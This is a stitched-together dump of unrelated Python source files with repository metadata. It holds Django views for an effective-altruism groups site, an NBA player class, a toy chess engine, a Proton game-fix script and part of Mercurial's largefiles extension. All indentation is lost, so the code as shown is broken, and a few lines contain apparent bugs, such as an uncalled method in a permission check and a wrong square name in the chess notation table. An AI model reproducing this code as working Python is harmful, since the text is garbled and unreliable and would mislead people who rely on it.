def get_form_kwargs(self):
return {**super().get_form_kwargs(), "user": self.request.user}
def form_valid(self, form):
if "city_or_town" in form.changed_data or "country" in form.changed_data:
form.instance.geocode()
old_name = self.object.name
self.object = form.save()
send_mail_on_change(
self.request, "update_group.txt", old_name, self.object.slug
)
return super().form_valid(form)
class LocalGroupDeleteView(rules_views.PermissionRequiredMixin, edit_views.DeleteView):
queryset = LocalGroup.objects.filter(is_public=True)
template_name = "eahub/delete_group.html"
permission_required = "localgroups.delete_local_group"
def delete(self, *args, **kwargs):
self.object = self.get_object()
name = self.object.name
slug = self.object.slug
self.object.delete()
send_mail_on_change(self.request, "delete_group.txt", name, slug)
return redirect(urls.reverse_lazy("groups"))
class ReportGroupAbuseView(ReportAbuseView):
def profile(self):
return LocalGroup.objects.get(slug=self.kwargs["slug"], is_public=True)
def get_type(self):
return "group"
class SendGroupMessageView(SendMessageView):
def get_recipient(self):
return LocalGroup.objects.get(slug=self.kwargs["slug"], is_public=True)
def form_valid(self, form):
message = form.cleaned_data["your_message"]
recipient = self.get_recipient()
sender_name = form.cleaned_data["your_name"]
subject = f"{sender_name} wants to connect with {recipient.name}!"
sender_email_address = form.cleaned_data["your_email_address"]
feedback_url = FeedbackURLConfig.get_solo().site_url
admins_email = get_admin_email()
txt_message = render_to_string(
"emails/message_group.txt",
{
"sender_name": sender_name,
"group_name": recipient.name,
"message": message,
"feedback_url": feedback_url,
"admins_email": admins_email,
},
)
html_message = render_to_string(
"emails/message_group.html",
{
"sender_name": sender_name,
"group_name": recipient.name,
"message": message,
"feedback_url": feedback_url,
"admins_email": admins_email,
},
)
recipient_emails = recipient.get_messaging_emails(self.request)
email = EmailMultiAlternatives(
subject=subject,
body=txt_message,
from_email=admins_email,
to=recipient_emails,
reply_to=[sender_email_address],
)
email.attach_alternative(html_message, "text/html")
email.send()
send_action_uuid = uuid.uuid4()
for recipient_email in recipient_emails:
log = MessagingLog(
sender_email=sender_email_address,
recipient_email=recipient_email,
recipient_type=MessagingLog.GROUP,
send_action_uuid=send_action_uuid,
)
log.save()
messages.success(
self.request, "Your message to " + recipient.name + " has been sent"
)
return redirect(reverse("group", args=([recipient.slug])))
def get(self, request, *args, **kwargs):
group = self.get_recipient()
if group.email or (
flag_enabled("MESSAGING_FLAG", request=request)
and group.has_organisers_with_messaging_enabled()
):
if not request.user.has_perm("profiles.message_users"):
raise PermissionDenied
return super().get(request, *args, **kwargs)
raise Http404("Messaging not available for this group")
def post(self, request, *args, **kwargs):
group = self.get_recipient()
if (
request.user.has_perm("profiles.message_users")
and group.email
or (
flag_enabled("MESSAGING_FLAG", request=request)
and group.has_organisers_with_messaging_enabled
)
):
return super().post(request, *args, **kwargs)
raise PermissionDenied
@login_required
@require_POST
def claim_group(request, slug):
group = get_object_or_404(LocalGroup, slug=slug, is_public=True)
subject = "EA Group claimed: {0}".format(group.name)
try:
user_eahub_url = "https://{0}/profile/{1}".format(
get_current_site(request).domain, request.user.profile.slug
)
user_name = request.user.profile.name
except Profile.DoesNotExist:
user_eahub_url = "about:blank"
user_name = request.user.email
message = render_to_string(
"emails/claim_group.txt",
{
"user_eahub_url": user_eahub_url,
"user_name": user_name,
"group_name": group.name,
"group_url": "https://{0}/group/{1}".format(
get_current_site(request).domain, group.slug
),
"user_email": request.user.email,
},
)
recipient_list = [email for email in settings.LEAN_MANAGERS]
recipient_list.append(settings.GROUPS_EMAIL)
send_mail(
subject, message, settings.DEFAULT_FROM_EMAIL, recipient_list=recipient_list
)
messages.success(
request,
"Thank you, we have received your request to claim this group. "
"Our admin team will send you an email once they have checked your request.",
)
return redirect("/group/{}".format(group.slug))
@login_required
@require_POST
def report_group_inactive(request, slug):
group = get_object_or_404(LocalGroup, slug=slug, is_public=True)
subject = "EA Group reported as inactive: {0}".format(group.name)
try:
user_eahub_url = "https://{0}/profile/{1}".format(
get_current_site(request).domain, request.user.profile.slug
)
except Profile.DoesNotExist:
user_eahub_url = "about:blank"
message = render_to_string(
"emails/report_group_inactive.txt",
{
"user_eahub_url": user_eahub_url,
"user_name": request.user.profile.name,
"group_name": group.name,
"group_url": "https://{0}/group/{1}".format(
get_current_site(request).domain, group.slug
),
"user_email": request.user.email,
},
)
send_mail(
subject,
message,
settings.DEFAULT_FROM_EMAIL,
recipient_list=settings.LEAN_MANAGERS,
)
messages.success(
request,
"Thank you, we have received your report. "
"Our admin team will send you an email once they have looked into it.",
)
return redirect("/group/{}".format(group.slug))
@login_required
@require_POST
def send_mail_on_change(request, template, name, slug):
if "update" in template:
action = "updated"
elif "create" in template:
action = "created"
elif "delete" in template:
action = "deleted"
else:
raise Exception("Template {0} does not exist".format(template))
subject = "EA Group {0}: {1}".format(action, name)
try:
user_eahub_url = "https://{0}/profile/{1}".format(
get_current_site(request).domain, request.user.profile.slug
)
user_name = request.user.profile.name
except Profile.DoesNotExist:
user_eahub_url = "about:blank"
user_name = request.user.email
message = render_to_string(
"emails/{0}".format(template),
{
"user_eahub_url": user_eahub_url,
"user_name": user_name,
"group_name": name,
"group_url": "https://{0}/group/{1}".format(
get_current_site(request).domain, slug
),
},
)
recipient_list = [email for email in settings.LEAN_MANAGERS]
recipient_list.append(settings.GROUPS_EMAIL)
send_mail(
subject, message, settings.DEFAULT_FROM_EMAIL, recipient_list=recipient_list
)
``` |
{
"source": "jnt999/NBAFantasyApp",
"score": 3
} |
#### File: jnt999/NBAFantasyApp/Player.py
```python
class Player:
#Creates a new player with the parameters set to the correct
#values
def __init__(self,firstname,lastname,pt,rb,ass):
self._firstname = firstname #Players first name
self._lastname = lastname #Players last name
self._pt = pt #Points per game
self._rb = rb #Rebounds per game
self._ass = ass #Assists per game
#Return the first name
@property
def firstname(self):
return self._firstname
#Return the last name
@property
def lastname(self):
return self._lastname
#Return the points per game
@property
def pt(self):
return self._pt
#Return the rebounds per game
@property
def rb(self):
return self._rb
#Return the assists
@property
def ass(self):
return self._ass
#Sets the first name
@firstname.setter
def firstname(self, firstname):
self._firstname = firstname
#Sets the last name
@lastname.setter
def lastname(self, lastname):
self._lastname = lastname
#Sets the points per game
@pt.setter
def pt(self, pt):
self._pt = pt
#Sets the rebounds
@rb.setter
def rb(self, rb):
self._rb = rb
#Sets the assists
@ass.setter
def ass(self, ass):
self._ass = ass
``` |
{
"source": "jntaimo/ledchess",
"score": 3
} |
#### File: Reference/python/test_engine.py
```python
white = 8 # 1000
black = 16 # 10000
board = [
22, 20, 21, 23, 19, 21, 20, 22, 0, 0, 0, 0, 0, 0, 0, 0,
18, 18, 18, 18, 18, 18, 18, 18, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0,
9, 9, 9, 9, 9, 9, 9, 9, 0, 0, 0, 0, 0, 0, 0, 0,
14, 12, 13, 15, 11, 13, 12, 14, 0, 0, 0, 0, 0, 0, 0, 0,
]
notation = [
'a8', 'b8', 'c8', 'd8', 'e8', 'f8', 'g8', 'h8', 'i8', 'j8', 'k8', 'l8', 'm8', 'n8', 'o8', 'p8',
'a7', 'b7', 'c7', 'd7', 'e7', 'f7', 'g7', 'h7', 'i7', 'j7', 'k7', 'l7', 'm7', 'n7', 'o7', 'p7',
'a6', 'b6', 'c6', 'd6', 'e6', 'f6', 'g6', 'h6', 'i6', 'j6', 'k6', 'l6', 'm6', 'n6', 'o6', 'p6',
'a5', 'b5', 'c5', 'd5', 'e5', 'f5', 'g5', 'h5', 'i5', 'j5', 'k5', 'l5', 'm5', 'n5', 'o5', 'p5',
'a4', 'b4', 'c4', 'd4', 'e4', 'f4', 'g4', 'h4', 'i4', 'j4', 'k4', 'l4', 'm4', 'n4', 'o4', 'p4',
'a3', 'b3', 'c3', 'd3', 'e3', 'f3', 'g3', 'h3', 'i3', 'j3', 'k3', 'l3', 'm3', 'n3', 'o3', 'p3',
'a2', 'b2', 'c2', 'd2', 'e2', 'f2', 'g2', 'h2', 'i2', 'j2', 'k2', 'l2', 'm2', 'n2', 'o2', 'p2',
'a2', 'b1', 'c1', 'd1', 'e1', 'f1', 'g1', 'h1', 'i1', 'j1', 'k1', 'l1', 'm1', 'n1', 'o1', 'p1',
]
move_offsets = [
15, 16, 17, 0, # black pawns
15, -16, -17, 0, # white pawns
1, 16, -1, -16, 0, # rooks
1, 16, -1, -16, 15, -15, 17, -17, 0, # queens, kings and bishops
14, -14, 18, -18, 31, -31, 33, -33, 0, # knights
3, -1, 12, 21, 16, 7, 12 # starting indices for each piece type in order
# white pawns, black pawns, kings, knights, bishops, rooks, queens
]
pieces = ".-pknbrq-P-KNBRQ"
def print_board():
index = 0
while index < 128:
# sq is on board
if(index & 0x88) == 0:
piece = board[index]
print(pieces[piece & 15], end=' ')
index += 1
else:
print()
index += 8
def search(side):
#move generator
index = 0
#loop over board squares
while index<128:
if (index & 0x88) == 0: #makes sure the piece is on the board
piece = board[index]
if piece & side: #if the piece is on the right side
piece_type = piece & 7
directions = move_offsets[piece_type + 30] #+30 moves it o the starting indices in move_offsets
directions += 1
#loop over more offsets
while move_offsets[directions]:
step_vector = move_offsets[directions]
directions += 1
source_square = index
target_square = source_square
captured_piece = 0
# loop over slider ray
while captured_piece == 0:
target_square += step_vector
captured_square = target_square
if target_square & 0x88: #if it's off the board
break
captured_piece = board[captured_square]
if captured_piece & side: #can't capture your own pieces
break
if (piece_type < 3 and (not (step_vector & 7)) != (not captured_piece)):
break
#make move
board[captured_square] = 0
board[source_square] = 0
board[target_square] = piece
#pawn promotion
if piece_type < 3:
if (target_square + step_vector + 1 & 0x80):
board[target_square] |= 7
print_board()
#take back
board[target_square] = 0
board[source_square] = piece
board[captured_square] = captured_piece
#fake capture for leapers
captured_piece += (piece_type < 5)
#unfake capture for double pawn move
if (piece_type < 3 and (6 * side + (target_square & 0x70) == 0x80)):
captured_piece -= 1
index += 1
search(white)
``` |
{
"source": "jntesteves/protonfixes",
"score": 2
} |
#### File: protonfixes/gamefixes/1113000.py
```python
from protonfixes import util
def main():
""" installs devenum, quartz, wmp9 and adjust pulse latency
"""
# Fix pre-rendered cutscene playback
util.protontricks('xactengine3_7_ge')
util.protontricks('d3dx11_43_ge')
util.protontricks('d3dcompiler_43_ge')
util.protontricks('wmp9_ge')
util.protontricks('quartz')
util.protontricks('klite_ge')
util.set_environment('WINEDLLOVERRIDES','mfplay=n')
``` |
{
"source": "jnthn/intellij-community",
"score": 2
} |
#### File: hgext/largefiles/overrides.py
```python
import os
import copy
from mercurial import hg, commands, util, cmdutil, scmutil, match as match_, \
node, archival, error, merge, discovery
from mercurial.i18n import _
from mercurial.node import hex
from hgext import rebase
import lfutil
import lfcommands
import basestore
# -- Utility functions: commonly/repeatedly needed functionality ---------------
def installnormalfilesmatchfn(manifest):
'''overrides scmutil.match so that the matcher it returns will ignore all
largefiles'''
oldmatch = None # for the closure
def overridematch(ctx, pats=[], opts={}, globbed=False,
default='relpath'):
match = oldmatch(ctx, pats, opts, globbed, default)
m = copy.copy(match)
notlfile = lambda f: not (lfutil.isstandin(f) or lfutil.standin(f) in
manifest)
m._files = filter(notlfile, m._files)
m._fmap = set(m._files)
m._always = False
origmatchfn = m.matchfn
m.matchfn = lambda f: notlfile(f) and origmatchfn(f) or None
return m
oldmatch = installmatchfn(overridematch)
def installmatchfn(f):
oldmatch = scmutil.match
setattr(f, 'oldmatch', oldmatch)
scmutil.match = f
return oldmatch
def restorematchfn():
'''restores scmutil.match to what it was before installnormalfilesmatchfn
was called. no-op if scmutil.match is its original function.
Note that n calls to installnormalfilesmatchfn will require n calls to
restore matchfn to reverse'''
scmutil.match = getattr(scmutil.match, 'oldmatch', scmutil.match)
def addlargefiles(ui, repo, *pats, **opts):
large = opts.pop('large', None)
lfsize = lfutil.getminsize(
ui, lfutil.islfilesrepo(repo), opts.pop('lfsize', None))
lfmatcher = None
if lfutil.islfilesrepo(repo):
lfpats = ui.configlist(lfutil.longname, 'patterns', default=[])
if lfpats:
lfmatcher = match_.match(repo.root, '', list(lfpats))
lfnames = []
m = scmutil.match(repo[None], pats, opts)
m.bad = lambda x, y: None
wctx = repo[None]
for f in repo.walk(m):
exact = m.exact(f)
lfile = lfutil.standin(f) in wctx
nfile = f in wctx
exists = lfile or nfile
# Don't warn the user when they attempt to add a normal tracked file.
# The normal add code will do that for us.
if exact and exists:
if lfile:
ui.warn(_('%s already a largefile\n') % f)
continue
if (exact or not exists) and not lfutil.isstandin(f):
wfile = repo.wjoin(f)
# In case the file was removed previously, but not committed
# (issue3507)
if not os.path.exists(wfile):
continue
abovemin = (lfsize and
os.lstat(wfile).st_size >= lfsize * 1024 * 1024)
if large or abovemin or (lfmatcher and lfmatcher(f)):
lfnames.append(f)
if ui.verbose or not exact:
ui.status(_('adding %s as a largefile\n') % m.rel(f))
bad = []
standins = []
# Need to lock, otherwise there could be a race condition between
# when standins are created and added to the repo.
wlock = repo.wlock()
try:
if not opts.get('dry_run'):
lfdirstate = lfutil.openlfdirstate(ui, repo)
for f in lfnames:
standinname = lfutil.standin(f)
lfutil.writestandin(repo, standinname, hash='',
executable=lfutil.getexecutable(repo.wjoin(f)))
standins.append(standinname)
if lfdirstate[f] == 'r':
lfdirstate.normallookup(f)
else:
lfdirstate.add(f)
lfdirstate.write()
bad += [lfutil.splitstandin(f)
for f in repo[None].add(standins)
if f in m.files()]
finally:
wlock.release()
return bad
def removelargefiles(ui, repo, *pats, **opts):
after = opts.get('after')
if not pats and not after:
raise util.Abort(_('no files specified'))
m = scmutil.match(repo[None], pats, opts)
try:
repo.lfstatus = True
s = repo.status(match=m, clean=True)
finally:
repo.lfstatus = False
manifest = repo[None].manifest()
modified, added, deleted, clean = [[f for f in list
if lfutil.standin(f) in manifest]
for list in [s[0], s[1], s[3], s[6]]]
def warn(files, msg):
for f in files:
ui.warn(msg % m.rel(f))
return int(len(files) > 0)
result = 0
if after:
remove, forget = deleted, []
result = warn(modified + added + clean,
_('not removing %s: file still exists\n'))
else:
remove, forget = deleted + clean, []
result = warn(modified, _('not removing %s: file is modified (use -f'
' to force removal)\n'))
result = warn(added, _('not removing %s: file has been marked for add'
' (use forget to undo)\n')) or result
for f in sorted(remove + forget):
if ui.verbose or not m.exact(f):
ui.status(_('removing %s\n') % m.rel(f))
# Need to lock because standin files are deleted then removed from the
# repository and we could race in-between.
wlock = repo.wlock()
try:
lfdirstate = lfutil.openlfdirstate(ui, repo)
for f in remove:
if not after:
# If this is being called by addremove, notify the user that we
# are removing the file.
if getattr(repo, "_isaddremove", False):
ui.status(_('removing %s\n') % f)
util.unlinkpath(repo.wjoin(f), ignoremissing=True)
lfdirstate.remove(f)
lfdirstate.write()
forget = [lfutil.standin(f) for f in forget]
remove = [lfutil.standin(f) for f in remove]
repo[None].forget(forget)
# If this is being called by addremove, let the original addremove
# function handle this.
if not getattr(repo, "_isaddremove", False):
for f in remove:
util.unlinkpath(repo.wjoin(f), ignoremissing=True)
repo[None].forget(remove)
finally:
wlock.release()
return result
# For overriding mercurial.hgweb.webcommands so that largefiles will
# appear at their right place in the manifests.
def decodepath(orig, path):
return lfutil.splitstandin(path) or path
# -- Wrappers: modify existing commands --------------------------------
# Add works by going through the files that the user wanted to add and
# checking if they should be added as largefiles. Then it makes a new
# matcher which matches only the normal files and runs the original
# version of add.
def overrideadd(orig, ui, repo, *pats, **opts):
normal = opts.pop('normal')
if normal:
if opts.get('large'):
raise util.Abort(_('--normal cannot be used with --large'))
return orig(ui, repo, *pats, **opts)
bad = addlargefiles(ui, repo, *pats, **opts)
installnormalfilesmatchfn(repo[None].manifest())
result = orig(ui, repo, *pats, **opts)
restorematchfn()
return (result == 1 or bad) and 1 or 0
def overrideremove(orig, ui, repo, *pats, **opts):
installnormalfilesmatchfn(repo[None].manifest())
result = orig(ui, repo, *pats, **opts)
restorematchfn()
return removelargefiles(ui, repo, *pats, **opts) or result
def overridestatusfn(orig, repo, rev2, **opts):
try:
repo._repo.lfstatus = True
return orig(repo, rev2, **opts)
finally:
repo._repo.lfstatus = False
def overridestatus(orig, ui, repo, *pats, **opts):
try:
repo.lfstatus = True
return orig(ui, repo, *pats, **opts)
finally:
repo.lfstatus = False
def overridedirty(orig, repo, ignoreupdate=False):
try:
repo._repo.lfstatus = True
return orig(repo, ignoreupdate)
finally:
repo._repo.lfstatus = False
def overridelog(orig, ui, repo, *pats, **opts):
def overridematch(ctx, pats=[], opts={}, globbed=False,
default='relpath'):
"""Matcher that merges root directory with .hglf, suitable for log.
It is still possible to match .hglf directly.
For any listed files run log on the standin too.
matchfn tries both the given filename and with .hglf stripped.
"""
match = oldmatch(ctx, pats, opts, globbed, default)
m = copy.copy(match)
standins = [lfutil.standin(f) for f in m._files]
m._files.extend(standins)
m._fmap = set(m._files)
m._always = False
origmatchfn = m.matchfn
def lfmatchfn(f):
lf = lfutil.splitstandin(f)
if lf is not None and origmatchfn(lf):
return True
r = origmatchfn(f)
return r
m.matchfn = lfmatchfn
return m
oldmatch = installmatchfn(overridematch)
try:
repo.lfstatus = True
return orig(ui, repo, *pats, **opts)
finally:
repo.lfstatus = False
restorematchfn()
def overrideverify(orig, ui, repo, *pats, **opts):
large = opts.pop('large', False)
all = opts.pop('lfa', False)
contents = opts.pop('lfc', False)
result = orig(ui, repo, *pats, **opts)
if large or all or contents:
result = result or lfcommands.verifylfiles(ui, repo, all, contents)
return result
def overridedebugstate(orig, ui, repo, *pats, **opts):
large = opts.pop('large', False)
if large:
lfcommands.debugdirstate(ui, repo)
else:
orig(ui, repo, *pats, **opts)
# Override needs to refresh standins so that update's normal merge
# will go through properly. Then the other update hook (overriding repo.update)
# will get the new files. Filemerge is also overridden so that the merge
# will merge standins correctly.
def overrideupdate(orig, ui, repo, *pats, **opts):
lfdirstate = lfutil.openlfdirstate(ui, repo)
s = lfdirstate.status(match_.always(repo.root, repo.getcwd()), [], False,
False, False)
(unsure, modified, added, removed, missing, unknown, ignored, clean) = s
# Need to lock between the standins getting updated and their
# largefiles getting updated
wlock = repo.wlock()
try:
if opts['check']:
mod = len(modified) > 0
for lfile in unsure:
standin = lfutil.standin(lfile)
if repo['.'][standin].data().strip() != \
lfutil.hashfile(repo.wjoin(lfile)):
mod = True
else:
lfdirstate.normal(lfile)
lfdirstate.write()
if mod:
raise util.Abort(_('uncommitted local changes'))
# XXX handle removed differently
if not opts['clean']:
for lfile in unsure + modified + added:
lfutil.updatestandin(repo, lfutil.standin(lfile))
finally:
wlock.release()
return orig(ui, repo, *pats, **opts)
# Before starting the manifest merge, merge.updates will call
# _checkunknown to check if there are any files in the merged-in
# changeset that collide with unknown files in the working copy.
#
# The largefiles are seen as unknown, so this prevents us from merging
# in a file 'foo' if we already have a largefile with the same name.
#
# The overridden function filters the unknown files by removing any
# largefiles. This makes the merge proceed and we can then handle this
# case further in the overridden manifestmerge function below.
def overridecheckunknownfile(origfn, repo, wctx, mctx, f):
if lfutil.standin(repo.dirstate.normalize(f)) in wctx:
return False
return origfn(repo, wctx, mctx, f)
# The manifest merge handles conflicts on the manifest level. We want
# to handle changes in largefile-ness of files at this level too.
#
# The strategy is to run the original manifestmerge and then process
# the action list it outputs. There are two cases we need to deal with:
#
# 1. Normal file in p1, largefile in p2. Here the largefile is
# detected via its standin file, which will enter the working copy
# with a "get" action. It is not "merge" since the standin is all
# Mercurial is concerned with at this level -- the link to the
# existing normal file is not relevant here.
#
# 2. Largefile in p1, normal file in p2. Here we get a "merge" action
# since the largefile will be present in the working copy and
# different from the normal file in p2. Mercurial therefore
# triggers a merge action.
#
# In both cases, we prompt the user and emit new actions to either
# remove the standin (if the normal file was kept) or to remove the
# normal file and get the standin (if the largefile was kept). The
# default prompt answer is to use the largefile version since it was
# presumably changed on purpose.
#
# Finally, the merge.applyupdates function will then take care of
# writing the files into the working copy and lfcommands.updatelfiles
# will update the largefiles.
def overridemanifestmerge(origfn, repo, p1, p2, pa, branchmerge, force,
partial, acceptremote=False):
overwrite = force and not branchmerge
actions = origfn(repo, p1, p2, pa, branchmerge, force, partial,
acceptremote)
processed = []
for action in actions:
if overwrite:
processed.append(action)
continue
f, m, args, msg = action
choices = (_('&Largefile'), _('&Normal file'))
splitstandin = lfutil.splitstandin(f)
if (m == "g" and splitstandin is not None and
splitstandin in p1 and f in p2):
# Case 1: normal file in the working copy, largefile in
# the second parent
lfile = splitstandin
standin = f
msg = _('%s has been turned into a largefile\n'
'use (l)argefile or keep as (n)ormal file?') % lfile
if repo.ui.promptchoice(msg, choices, 0) == 0:
processed.append((lfile, "r", None, msg))
processed.append((standin, "g", (p2.flags(standin),), msg))
else:
processed.append((standin, "r", None, msg))
elif m == "g" and lfutil.standin(f) in p1 and f in p2:
# Case 2: largefile in the working copy, normal file in
# the second parent
standin = lfutil.standin(f)
lfile = f
msg = _('%s has been turned into a normal file\n'
'keep as (l)argefile or use (n)ormal file?') % lfile
if repo.ui.promptchoice(msg, choices, 0) == 0:
processed.append((lfile, "r", None, msg))
else:
processed.append((standin, "r", None, msg))
processed.append((lfile, "g", (p2.flags(lfile),), msg))
else:
processed.append(action)
return processed
# Override filemerge to prompt the user about how they wish to merge
# largefiles. This will handle identical edits, and copy/rename +
# edit without prompting the user.
def overridefilemerge(origfn, repo, mynode, orig, fcd, fco, fca):
# Use better variable names here. Because this is a wrapper we cannot
# change the variable names in the function declaration.
fcdest, fcother, fcancestor = fcd, fco, fca
if not lfutil.isstandin(orig):
return origfn(repo, mynode, orig, fcdest, fcother, fcancestor)
else:
if not fcother.cmp(fcdest): # files identical?
return None
# backwards, use working dir parent as ancestor
if fcancestor == fcother:
fcancestor = fcdest.parents()[0]
if orig != fcother.path():
repo.ui.status(_('merging %s and %s to %s\n')
% (lfutil.splitstandin(orig),
lfutil.splitstandin(fcother.path()),
lfutil.splitstandin(fcdest.path())))
else:
repo.ui.status(_('merging %s\n')
% lfutil.splitstandin(fcdest.path()))
if fcancestor.path() != fcother.path() and fcother.data() == \
fcancestor.data():
return 0
if fcancestor.path() != fcdest.path() and fcdest.data() == \
fcancestor.data():
repo.wwrite(fcdest.path(), fcother.data(), fcother.flags())
return 0
if repo.ui.promptchoice(_('largefile %s has a merge conflict\n'
'keep (l)ocal or take (o)ther?') %
lfutil.splitstandin(orig),
(_('&Local'), _('&Other')), 0) == 0:
return 0
else:
repo.wwrite(fcdest.path(), fcother.data(), fcother.flags())
return 0
# Copy first changes the matchers to match standins instead of
# largefiles. Then it overrides util.copyfile in that function it
# checks if the destination largefile already exists. It also keeps a
# list of copied files so that the largefiles can be copied and the
# dirstate updated.
def overridecopy(orig, ui, repo, pats, opts, rename=False):
# doesn't remove largefile on rename
if len(pats) < 2:
# this isn't legal, let the original function deal with it
return orig(ui, repo, pats, opts, rename)
def makestandin(relpath):
path = scmutil.canonpath(repo.root, repo.getcwd(), relpath)
return os.path.join(repo.wjoin(lfutil.standin(path)))
fullpats = scmutil.expandpats(pats)
dest = fullpats[-1]
if os.path.isdir(dest):
if not os.path.isdir(makestandin(dest)):
os.makedirs(makestandin(dest))
# This could copy both lfiles and normal files in one command,
# but we don't want to do that. First replace their matcher to
# only match normal files and run it, then replace it to just
# match largefiles and run it again.
nonormalfiles = False
nolfiles = False
try:
try:
installnormalfilesmatchfn(repo[None].manifest())
result = orig(ui, repo, pats, opts, rename)
except util.Abort, e:
if str(e) != _('no files to copy'):
raise e
else:
nonormalfiles = True
result = 0
finally:
restorematchfn()
# The first rename can cause our current working directory to be removed.
# In that case there is nothing left to copy/rename so just quit.
try:
repo.getcwd()
except OSError:
return result
try:
try:
# When we call orig below it creates the standins but we don't add
# them to the dir state until later so lock during that time.
wlock = repo.wlock()
manifest = repo[None].manifest()
oldmatch = None # for the closure
def overridematch(ctx, pats=[], opts={}, globbed=False,
default='relpath'):
newpats = []
# The patterns were previously mangled to add the standin
# directory; we need to remove that now
for pat in pats:
if match_.patkind(pat) is None and lfutil.shortname in pat:
newpats.append(pat.replace(lfutil.shortname, ''))
else:
newpats.append(pat)
match = oldmatch(ctx, newpats, opts, globbed, default)
m = copy.copy(match)
lfile = lambda f: lfutil.standin(f) in manifest
m._files = [lfutil.standin(f) for f in m._files if lfile(f)]
m._fmap = set(m._files)
m._always = False
origmatchfn = m.matchfn
m.matchfn = lambda f: (lfutil.isstandin(f) and
(f in manifest) and
origmatchfn(lfutil.splitstandin(f)) or
None)
return m
oldmatch = installmatchfn(overridematch)
listpats = []
for pat in pats:
if match_.patkind(pat) is not None:
listpats.append(pat)
else:
listpats.append(makestandin(pat))
try:
origcopyfile = util.copyfile
copiedfiles = []
def overridecopyfile(src, dest):
if (lfutil.shortname in src and
dest.startswith(repo.wjoin(lfutil.shortname))):
destlfile = dest.replace(lfutil.shortname, '')
if not opts['force'] and os.path.exists(destlfile):
raise IOError('',
_('destination largefile already exists'))
copiedfiles.append((src, dest))
origcopyfile(src, dest)
util.copyfile = overridecopyfile
result += orig(ui, repo, listpats, opts, rename)
finally:
util.copyfile = origcopyfile
lfdirstate = lfutil.openlfdirstate(ui, repo)
for (src, dest) in copiedfiles:
if (lfutil.shortname in src and
dest.startswith(repo.wjoin(lfutil.shortname))):
srclfile = src.replace(repo.wjoin(lfutil.standin('')), '')
destlfile = dest.replace(repo.wjoin(lfutil.standin('')), '')
destlfiledir = os.path.dirname(repo.wjoin(destlfile)) or '.'
if not os.path.isdir(destlfiledir):
os.makedirs(destlfiledir)
if rename:
os.rename(repo.wjoin(srclfile), repo.wjoin(destlfile))
lfdirstate.remove(srclfile)
else:
util.copyfile(repo.wjoin(srclfile),
repo.wjoin(destlfile))
lfdirstate.add(destlfile)
lfdirstate.write()
except util.Abort, e:
if str(e) != _('no files to copy'):
raise e
else:
nolfiles = True
finally:
restorematchfn()
wlock.release()
if nolfiles and nonormalfiles:
raise util.Abort(_('no files to copy'))
return result
# When the user calls revert, we have to be careful to not revert any
# changes to other largefiles accidentally. This means we have to keep
# track of the largefiles that are being reverted so we only pull down
# the necessary largefiles.
#
# Standins are only updated (to match the hash of largefiles) before
# commits. Update the standins then run the original revert, changing
# the matcher to hit standins instead of largefiles. Based on the
# resulting standins update the largefiles. Then return the standins
# to their proper state
def overriderevert(orig, ui, repo, *pats, **opts):
# Because we put the standins in a bad state (by updating them)
# and then return them to a correct state we need to lock to
# prevent others from changing them in their incorrect state.
wlock = repo.wlock()
try:
lfdirstate = lfutil.openlfdirstate(ui, repo)
(modified, added, removed, missing, unknown, ignored, clean) = \
lfutil.lfdirstatestatus(lfdirstate, repo, repo['.'].rev())
lfdirstate.write()
for lfile in modified:
lfutil.updatestandin(repo, lfutil.standin(lfile))
for lfile in missing:
if (os.path.exists(repo.wjoin(lfutil.standin(lfile)))):
os.unlink(repo.wjoin(lfutil.standin(lfile)))
try:
ctx = scmutil.revsingle(repo, opts.get('rev'))
oldmatch = None # for the closure
def overridematch(ctx, pats=[], opts={}, globbed=False,
default='relpath'):
match = oldmatch(ctx, pats, opts, globbed, default)
m = copy.copy(match)
def tostandin(f):
if lfutil.standin(f) in ctx:
return lfutil.standin(f)
elif lfutil.standin(f) in repo[None]:
return None
return f
m._files = [tostandin(f) for f in m._files]
m._files = [f for f in m._files if f is not None]
m._fmap = set(m._files)
m._always = False
origmatchfn = m.matchfn
def matchfn(f):
if lfutil.isstandin(f):
# We need to keep track of what largefiles are being
# matched so we know which ones to update later --
# otherwise we accidentally revert changes to other
# largefiles. This is repo-specific, so duckpunch the
# repo object to keep the list of largefiles for us
# later.
if origmatchfn(lfutil.splitstandin(f)) and \
(f in repo[None] or f in ctx):
lfileslist = getattr(repo, '_lfilestoupdate', [])
lfileslist.append(lfutil.splitstandin(f))
repo._lfilestoupdate = lfileslist
return True
else:
return False
return origmatchfn(f)
m.matchfn = matchfn
return m
oldmatch = installmatchfn(overridematch)
scmutil.match
matches = overridematch(repo[None], pats, opts)
orig(ui, repo, *pats, **opts)
finally:
restorematchfn()
lfileslist = getattr(repo, '_lfilestoupdate', [])
lfcommands.updatelfiles(ui, repo, filelist=lfileslist,
printmessage=False)
# empty out the largefiles list so we start fresh next time
repo._lfilestoupdate = []
for lfile in modified:
if lfile in lfileslist:
if os.path.exists(repo.wjoin(lfutil.standin(lfile))) and lfile\
in repo['.']:
lfutil.writestandin(repo, lfutil.standin(lfile),
repo['.'][lfile].data().strip(),
'x' in repo['.'][lfile].flags())
lfdirstate = lfutil.openlfdirstate(ui, repo)
for lfile in added:
standin = lfutil.standin(lfile)
if standin not in ctx and (standin in matches or opts.get('all')):
if lfile in lfdirstate:
lfdirstate.drop(lfile)
util.unlinkpath(repo.wjoin(standin))
lfdirstate.write()
finally:
wlock.release()
def hgupdaterepo(orig, repo, node, overwrite):
if not overwrite:
# Only call updatelfiles on the standins that have changed to save time
oldstandins = lfutil.getstandinsstate(repo)
result = orig(repo, node, overwrite)
filelist = None
if not overwrite:
newstandins = lfutil.getstandinsstate(repo)
filelist = lfutil.getlfilestoupdate(oldstandins, newstandins)
lfcommands.updatelfiles(repo.ui, repo, filelist=filelist)
return result
def hgmerge(orig, repo, node, force=None, remind=True):
result = orig(repo, node, force, remind)
lfcommands.updatelfiles(repo.ui, repo)
return result
# When we rebase a repository with remotely changed largefiles, we need to
# take some extra care so that the largefiles are correctly updated in the
# working copy
def overridepull(orig, ui, repo, source=None, **opts):
revsprepull = len(repo)
if not source:
source = 'default'
repo.lfpullsource = source
if opts.get('rebase', False):
repo._isrebasing = True
try:
if opts.get('update'):
del opts['update']
ui.debug('--update and --rebase are not compatible, ignoring '
